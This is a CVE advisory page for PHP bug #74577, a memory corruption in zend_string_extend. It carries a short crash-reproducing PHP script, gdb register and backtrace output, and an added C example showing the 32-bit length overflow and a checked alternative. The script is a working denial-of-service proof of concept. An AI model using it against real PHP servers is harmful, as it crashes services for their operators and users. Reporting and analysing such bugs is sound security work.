CVE-2017-8923: PHP :: Bug #74577 :: Memory corruption in zend_string_extend

The zend_string_extend function in Zend/zend_string.h in PHP through 7.1.5 does not prevent changes to string objects that result in a negative length, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact by leveraging a script’s use of .= with a long string.

Category: CVE. Tags: #dos #git #php #sap

Bug #74577: Memory corruption in zend_string_extend

Submitted: 2017-05-12 06:33 UTC
Modified: 2017-05-12 06:46 UTC
From: whitehat002 at hotmail dot com
Assigned:
Status: Duplicate
Package: Reproducible crash
PHP Version: 7.1.5
OS:
Private report: No
CVE-ID: None

[2017-05-12 06:33 UTC] whitehat002 at hotmail dot com

Description:

This bug only exists in PHP 7. This can result in denial of service or other problems.

Test script:

<?php
// Lift the memory limit so the ~2 GiB string below can be allocated.
ini_set('memory_limit', -1);
// 0x7ffffe00 bytes: just below the signed 32-bit maximum.
$a = str_repeat("a", 0x7ffffe00);
// Appending the string to itself doubles the length to 0xfffffc00, which
// zend_string_extend receives as a negative length on the 32-bit build
// shown in the crash trace below.
$a .= $a;

Expected result:

no crash

Actual result:

[----------------------------------registers-----------------------------------]
EAX: 0xfffffc00
EBX: 0xb7013050 --> 0x36c00000
ECX: 0x80000000
EDX: 0x36c00010
ESI: 0xb7013050 --> 0x36c00000
EDI: 0x36c00000
EBP: 0x7ffffe00
ESP: 0xbfffc080 --> 0x0
EIP: 0x83b7b09 (<concat_function+393>: mov DWORD PTR [edi+0x8],0x0)
EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x83b7b00 <concat_function+384>: mov edi,eax
   0x83b7b02 <concat_function+386>: mov eax,DWORD PTR [esp+0x18]
   0x83b7b06 <concat_function+390>: lea edx,[edi+0x10]
=> 0x83b7b09 <concat_function+393>: mov DWORD PTR [edi+0x8],0x0
   0x83b7b10 <concat_function+400>: mov DWORD PTR [esp+0x2c],edx
   0x83b7b14 <concat_function+404>: mov DWORD PTR [edi+0xc],eax
   0x83b7b17 <concat_function+407>: jmp 0x83b7a56 <concat_function+214>
   0x83b7b1c <concat_function+412>: mov ecx,DWORD PTR [esp+0x20]
[------------------------------------stack-------------------------------------]
0000| 0xbfffc080 --> 0x0
0004| 0xbfffc084 --> 0x5
0008| 0xbfffc088 --> 0xbfffc1a8 --> 0x1
0012| 0xbfffc08c --> 0xbfffc110 --> 0xb70543f0 --> 0xb70543d8 --> 0xb70543a8 --> 0xb7054420 (--> ...)
0016| 0xbfffc090 --> 0xb705e320 --> 0x0
0020| 0xbfffc094 --> 0x7ffffe00
0024| 0xbfffc098 --> 0xfffffc00
0028| 0xbfffc09c --> 0xb7013050 --> 0x36c00000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
zend_string_extend (persistent=0x0, len=0xfffffc00, s=0x36c00000) at /root/php-7.1.5/Zend/zend_string.h:210
210	zend_string_forget_hash_val(ret);
gdb-peda$ bt
#0  zend_string_extend (persistent=0x0, len=0xfffffc00, s=0x36c00000) at /root/php-7.1.5/Zend/zend_string.h:210
#1  concat_function (result=0xb7013050, op1=0xb7013050, op2=0xb7013050) at /root/php-7.1.5/Zend/zend_operators.c:1759
#2  0x08439dba in zend_binary_assign_op_helper_SPEC_CV_CV (binary_op=0x83b7980 <concat_function>, execute_data=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:44196
#3  0x0840969e in execute_ex (ex=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:432
#4  0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0) at /root/php-7.1.5/Zend/zend_vm_execute.h:474
#5  0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3) at /root/php-7.1.5/Zend/zend.c:1476
#6  0x08362cad in php_execute_script (primary_file=0xbfffe464) at /root/php-7.1.5/main/main.c:2537
#7  0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:993
#8  0x080785ad in main (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:1381
#9  0xb791daf3 in __libc_start_m
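The arithmetic behind the crash above, as an added illustration that is not part of the bug report and not PHP's own code: the report's 32-bit build passes len=0xfffffc00 to zend_string_extend, which is exactly 0x7ffffe00 + 0x7ffffe00 computed in 32-bit unsigned arithmetic, and reads as -1024 when interpreted as a signed 32-bit value (the "negative length" in the CVE description). The model below uses uint32_t to stand in for a 32-bit size_t, an assumed header size HDR_SIZE that is not PHP's real layout, and a hypothetical concat_len_checked that rejects any combined length which wraps or which would be negative as a signed length. The numbers are the ones on the page; the checks are this example's, not the upstream fix.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for size_t on the 32-bit build shown in the crash trace. */
typedef uint32_t sz32;

/* Assumed header size preceding the character data of a zend_string-like
 * object (refcount, type info, hash, len). Constructed for this model;
 * not PHP's actual struct layout. */
#define HDR_SIZE 16u

/* Largest length that is still non-negative as a signed 32-bit value. */
#define MAX_SIGNED_LEN ((sz32)INT32_MAX)

/* Unchecked combined length: what a plain `op1_len + op2_len` yields. */
sz32 concat_len_unchecked(sz32 a, sz32 b)
{
    return a + b; /* wraps silently in 32-bit arithmetic */
}

/* Bytes that an allocation for `len` characters would request
 * (header + characters + terminating NUL), also in 32-bit arithmetic. */
sz32 alloc_size_unchecked(sz32 len)
{
    return HDR_SIZE + len + 1u;
}

/* Hypothetical hardened version: refuse the extension instead of handing
 * a wrapped or negative length to the allocator. Returns false and leaves
 * *out untouched on rejection. */
bool concat_len_checked(sz32 a, sz32 b, sz32 *out)
{
    if (a > UINT32_MAX - b) {
        return false;                 /* a + b wraps size_t */
    }
    sz32 len = a + b;
    if (len > UINT32_MAX - HDR_SIZE - 1u) {
        return false;                 /* header + len + 1 wraps */
    }
    if (len > MAX_SIGNED_LEN) {
        return false;                 /* negative when read as a signed zend_long */
    }
    *out = len;
    return true;
}

int main(void)
{
    sz32 a = 0x7ffffe00u;             /* the length from the report's test script */
    sz32 len = concat_len_unchecked(a, a);
    sz32 safe = 0;

    printf("unchecked len   = 0x%08x (as signed: %d)\n", len, (int32_t)len);
    printf("alloc request   = 0x%08x bytes\n", alloc_size_unchecked(len));
    printf("checked accepts = %s\n", concat_len_checked(a, a, &safe) ? "yes" : "no");
    return 0;
}
```

Run on the report's input this prints a length of 0xfffffc00 (-1024 signed) and an allocation request of nearly 4 GiB, and the checked version rejects the operation; the same three guards apply to any size computation that feeds an allocator, whichever width size_t has.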
